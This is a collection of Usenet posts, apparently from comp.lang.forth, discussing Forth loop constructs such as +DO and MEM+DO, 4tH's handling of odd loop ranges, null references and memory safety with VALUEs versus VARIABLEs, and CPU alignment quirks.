|since version 2.16, glibc header files don't expose the function
|declaration if the _ISOC11_SOURCE feature test macro is defined.
- anton
In a perfect world I'd have a word:
- That puts *three* parameters on the stack: limit, start and step;
- That evaluates these three parameters and leaves a flag
- That takes this flag and skips the loop if zero.
Let's call the word that initializes these actions "+DO". +DO equals (
limit index step -- R: limit index step)
Compare: https://rosettacode.org/wiki/Loops/Wrong_ranges#uBasic/4tH
To the rather weak: https://rosettacode.org/wiki/Loops/Wrong_ranges#Forth
Note that 4tH behaves differently here. It catches most of the exceptional situations:
start: -2 stop: 2 inc: 1 | -2 -1 0 1
start: -2 stop: 2 inc: 0 | -2
start: -2 stop: 2 inc: -1 | -2
start: -2 stop: 2 inc: 10 | -2
start: 2 stop: -2 inc: 1 | 2
start: 2 stop: 2 inc: 1 | 2
start: 2 stop: 2 inc: -1 | 2
start: 2 stop: 2 inc: 0 | 2
start: 0 stop: 0 inc: 0 | 0
Versus:
Some of these loop infinitely, and some under/overflow, so for the sake
of brevity long outputs will be truncated by ....
start: -2 stop: 2 inc: 1 | -2 -1 0 1
start: -2 stop: 2 inc: 0 | -2 -2 -2 -2 -2 ...
start: -2 stop: 2 inc: -1 | -2 -3 -4 -5 ... 5 4 3 2
start: -2 stop: 2 inc: 10 | -2
start: 2 stop: -2 inc: 1 | 2 3 4 5 ... -6 -5 -4 -3
start: 2 stop: 2 inc: 1 | 2 3 4 5 ... -2 -1 0 1
start: 2 stop: 2 inc: -1 | 2
start: 2 stop: 2 inc: 0 | 2 2 2 2 2 ...
start: 0 stop: 0 inc: 0 | 0 0 0 0 0 ...
I still don't think 4tH's performance is perfect, but it's a tradeoff
between compatibility and intuitive behavior.
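For comparison, a hedged sketch of that guarded behaviour in plain Forth with BEGIN/WHILE/REPEAT; it pre-tests, so a zero step or a step pointing away from the limit gives an empty loop, and the name is invented:

: guarded-range ( limit start step -- )
   dup 0= if drop 2drop exit then     \ a zero step can never terminate
   begin
     over 3 pick                      \ -- limit index step index limit
     2 pick 0> if < else > then       \ index still on the start side of the limit?
   while
     over .                           \ visit the current index
     tuck + swap                      \ index := index + step
   repeat
   drop 2drop ;

2 -2 1 guarded-range prints -2 -1 0 1; the degenerate parameter sets from the table above all terminate, though a pre-testing loop prints nothing in several cases where 4tH prints the start value once.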
A recent addition to Gforth are MEM+DO and MEM-DO with the run-time
stack effect
MEM+DO ( addr ubytes +nstride -- R:loop-sys )
MEM-DO ( addr ubytes +nstride -- R:loop-sys )
which is paired with LOOP. Both produce the same addresses (if ubytes
is a multiple of +nstride), but MEM-DO in reverse order.
.. NEXT and <FOR .. NEXT \ index N for 1-dim vectors
.. NEXT and <<FOR .. NEXT \ indices X Y for 2-dim arrays.
On 13/03/2024 9:00 pm, mhx wrote:
Anton Ertl wrote:
[..]
A recent addition to Gforth are MEM+DO and MEM-DO with the run-time
stack effect
MEM+DO ( addr ubytes +nstride -- R:loop-sys )
MEM-DO ( addr ubytes +nstride -- R:loop-sys )
Interesting! It's always a nuisance when one wants to step backwards.
Does it work with UNLOOP and does one point at the start of the area or at the address of the first item to process?
Make one using BEGIN WHILE REPEAT. That's what Forth is for.
Anton Ertl wrote:
[..]
A recent addition to Gforth are MEM+DO and MEM-DO with the run-time
stack effect
MEM+DO ( addr ubytes +nstride -- R:loop-sys )
MEM-DO ( addr ubytes +nstride -- R:loop-sys )
Interesting! It's always a nuisance when one wants to step backwards.
Does it work with UNLOOP
and does one point at the start of the area
or at the address of the first item to process?
So [Algol68] nil + reference takes the same place as NULL + pointer in C.
You are supposed to test for this case, but if you fail you get a "Segmentation fault". As far as Forth goes, that is pretty
satisfactory security.
albert@spenarnc.xs4all.nl writes:
So [Algol68] nil + reference takes the same place as NULL + pointer in c.
I'm unfamiliar with Algol68 but if every reference in it can be set to
nil, that sounds like the same error that Algol-W had. The alternative, using an option value, means: 1) if the reference is not wrapped by an
option type, then it is guaranteed to not be null; 2) if it is wrapped
by an option type, then the compiler can stop you (or at least warn you)
if you try to dereference without first checking that it is non-null.
You are supposed to test for this case, but if you fail you get a
"Segmentation fault". As far as Forth goes, that is pretty
satisfactory security.
For sure, it is usually better to crash than to keep running and give nonsense answers. Of course that usually requires a hardware fault on dereferencing a null pointer, rather than giving whatever is at location
0 in memory like on unprotected machines.
Beyond not giving wrong answers, it's usually nice if your program
doesn't crash too often, especially from program bugs. Getting help
from the compiler for that is often useful.
Algol68 doesn't crash. It gives a run time error of the type
You can't get much help from the compiler for uninitialised references
like this. Either it crashes in the first run or it is insidious.
albert@spenarnc.xs4all.nl writes:
Algol68 doesn't crash. It gives a run time error of the type
Well that's what I mean by crashing. The program is terminated "involuntarily", or alternatively there is some way to catch the exception. Either way, the computation doesn't proceed.
You can't get much help from the compiler for uninitialised references
like this. Either it crashes in the first run or it is insidious.
No idea about Algol68 but in (at least some) other languages, the idea
of having references instead of pointers is that it is impossible to
create an uninitialised reference.
In Forth parlance: unless you're doing system programming where you
need it, don't use direct memory operations like @ ! MOVE, etc. This
also prohibits the use of VARIABLE. VARIABLES are uninitialized and
are accessed by @ !.
So I regularly use either xVALUEs (x means different data types) or data objects (for compound or dynamic types) with access methods. This results
in cleaner code and improves memory safety.
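A minimal sketch of the contrast in standard Forth (names invented); the VALUE is created initialized and is never touched with @ or !:

variable counter                 \ an uninitialized cell, read and written with @ and !
: bump-var ( -- )  1 counter +! ;

0 value counter'                 \ initialized at creation, read by name, written with TO
: bump-val ( -- )  counter' 1+ to counter' ;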
minforth@gmx.net (minforth) writes:
In Forth parlance: unless you're doing system programming where you
need it, don't use direct memory operations like @ ! MOVE, etc. This
also prohibits the use of VARIABLE. VARIABLES are uninitialized and
are accessed by @ !.
That helps but I'm sure there are other hazards. What do you do about arrays?
XZ14 (or TO XZ14) writes the top matrix to array value XZ14, et cetera.
What about ALLOT or ALLOCATE?
At least in gforth, VARIABLEs are initialized to 0. That seems like a
good thing for implementations to do in general.
At least in gforth, VARIABLEs are initialized to 0. That seems like a
good thing for implementations to do in general.
That's something I'd do for VALUEs should I move to omit the numeric
prefix at creation. By automatically initializing VALUEs with 0, I can pretend - if only to myself - that VALUEs are different from VARIABLEs.
Non-standard $VALUEs (for dynamic strings) or
DVALUEs/ZVALUEs can be very practical too.
minforth@gmx.net (minforth) writes:
Non-standard $VALUEs (for dynamic strings) or
DVALUEs/ZVALUEs can be very practical too.
2VALUE is standard.
Tristan Wibberley wrote:
Or special purpose computers that are not mass marketed, but I wasn't
aware they'd fixed all the public market computers. Thanks for the info.
You are still in for some nasty surprises with "public market" ARM CPUs. f.ex.
https://developer.arm.com/documentation/den0013/d/Porting/Alignment
On 05/03/2024 14:03, minforth wrote:
Tristan Wibberley wrote:
Or special purpose computers that are not mass marketed, but I wasn't
aware they'd fixed all the public market computers. Thanks for the info.
You are still in for some nasty surprises with "public market" ARM CPUs.
f.ex.
https://developer.arm.com/documentation/den0013/d/Porting/Alignment
And then we're not even trying to talk about what's in use and for sale
today but rather what will be in use over the next 6 decades. Most of
the historical peculiarities that are eliminated with more complex
hardware instead of longer software can be expected to be present at
some point during that period because more complex hardware is already a difficult problem for information security and I'd expect those
peculiarities wouldn't have been present if there weren't some
efficiency earned.